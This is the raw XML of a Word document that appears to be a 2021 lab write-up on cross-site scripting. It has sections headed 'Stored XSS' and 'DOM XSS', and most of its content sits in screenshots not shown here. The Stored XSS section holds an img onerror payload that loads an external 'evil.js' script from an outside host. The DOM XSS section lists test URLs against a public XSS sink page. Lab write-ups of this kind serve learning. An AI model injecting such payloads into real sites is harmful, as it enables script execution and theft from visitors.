                          <pic:cNvPr id="483" name="Picture 48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" name="Picture 48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7375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46" style="width:468pt;height:409.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,52006">
                <v:shape id="Picture 483" style="position:absolute;width:59436;height:17526;left:0;top:0;" filled="f">
                  <v:imagedata r:id="rId25"/>
                </v:shape>
                <v:shape id="Picture 486" style="position:absolute;width:59436;height:33432;left:0;top:18573;" filled="f">
                  <v:imagedata r:id="rId26"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4844416F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7D8F1603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754C775C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118BF172" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="38" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BA60FB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49274A5C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035C88B6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0FF56711" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="38" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547FAC73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4107973C" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC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B41C25F" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:ind w:left="-5" w:right="187"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Challenge question: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CA8DBB" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="38" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="44" w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C7BC6E5" wp14:editId="638A1E59">
            <wp:extent cx="5943600" cy="3228975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AC02E4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06F7DB5E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6DA76642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4A0AEC42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20168A9A" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="38" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCFFBA2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14F5267C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1BD2121B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650D4BFB" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="38" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A28C289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18BBE042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7A96F952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0CE7CB95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3379D24B" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="38" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638565CE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0F9F7285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72F91442" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC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88B0DCE" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Stored XSS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699D6BFA" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="0" w:line="274" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left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=1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="s=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  <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>='//</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xss-doc.app</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> spot.com/static/evil.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>';</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>document.body.appendChild</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(s);" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57445559" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="4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BB308C" wp14:editId="5C423A22">
                <wp:extent cx="5943600" cy="6781800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3547" name="Group 3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81800"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5943600" cy="6781800"/>
                        </a:xfrm>
                      </wpg:grpSpPr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8525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47" style="width:468pt;height:534pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,67818">
                <v:shape id="Picture 544" style="position:absolute;width:59436;height:33432;left:0;top:0;" filled="f">
                  <v:imagedata r:id="rId30"/>
                </v:shape>
                <v:shape id="Picture 547" style="position:absolute;width:59436;height:33432;left:0;top:34385;" filled="f">
                  <v:imagedata r:id="rId31"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738B1703" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">DOM XSS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FECC92" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7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BD0AEE" wp14:editId="365951D6">
                <wp:extent cx="5943600" cy="5800725"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3269" name="Group 3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00725"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5943600" cy="5800725"/>
                        </a:xfrm>
                      </wpg:grpSpPr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3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866775"/>
                            <a:ext cx="5943600" cy="102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" name="Picture 56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8825"/>
                            <a:ext cx="5943600" cy="64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9400"/>
                            <a:ext cx="5943600" cy="2981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69" style="width:468pt;height:456.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,58007">
                <v:shape id="Picture 561" style="position:absolute;width:59436;height:7334;left:0;top:0;" filled="f">
                  <v:imagedata r:id="rId36"/>
                </v:shape>
                <v:shape id="Picture 563" style="position:absolute;width:59436;height:10287;left:0;top:8667;" filled="f">
                  <v:imagedata r:id="rId37"/>
                </v:shape>
                <v:shape id="Picture 565" style="position:absolute;width:59436;height:6477;left:0;top:20288;" filled="f">
                  <v:imagedata r:id="rId38"/>
                </v:shape>
                <v:shape id="Picture 568" style="position:absolute;width:59436;height:29813;left:0;top:28194;" filled="f">
                  <v:imagedata r:id="rId39"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFAC7E4" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7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75D36146" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:ind w:left="-5" w:right="187"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">https://brutelogic.com.br/tests/sinks.html?name=Amritesh </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4947A68D" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="0" w:line="274" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="44" w:firstLine="30"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BA53E82" wp14:editId="2D5BCACF">
            <wp:extent cx="5943600" cy="638175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="574" name="Picture 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CD4D42" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:ind w:left="-5" w:right="187"/>
      </w:pPr>
      <w:r>
        <w:t>https://brutelogic.com.br/tests/sinks.html?redir=https:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">//www.googl e.com/ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B19B53E" w14:textId="77777777" w:rsidR="00005419" w:rsidRDefault="00380BC7">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="44" w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="358028EA" wp14:editId="10AE57F3">
            <wp:extent cx="5943600" cy="2181225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="588" name="Picture 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Picture 58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005419">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1492" w:right="1247" w:bottom="145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50B22"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="91FA9B68"/>
    <w:lvl w:ilvl="0" w:tplc="7F5C73D2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F80C8E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52AA13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5A0DE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6EC2A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75AD46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21AAF3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F886C9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C0AFA6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B15294B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D65E7AF0"/>
    <w:lvl w:ilvl="0" w:tplc="E3D88F82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C986F1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0CC7C0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01A28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4EA503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1B288D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A16E0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AA45E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C8687E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419"/>
    <w:rsid w:val="00005419"/>
    <w:rsid w:val="0038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F6F82"/>
  <w15:docId w15:val="{34FB78B9-8E04-4259-8D04-9BB2715B7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0" w:right="199" w:hanging="10"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial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00.jpg"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image170.jpg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.jpg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.jpg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image0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60.jpg"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jpg"/><Relationship Id="rId41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1.jpg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.jpg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.jpg"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image150.jpg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.jpg"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jpg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.jpg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image140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image" Target="media/image13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80.jpg"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.jpg"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.jpg"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.jpg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.jpg"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.jpg"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.jpg"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.jpg"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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313</Words>
  <Characters>1787</Characters>
  <Application>Microsoft Office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Amritesh Dasari</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>Amritesh Dasari</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-09T06:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-09T06:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>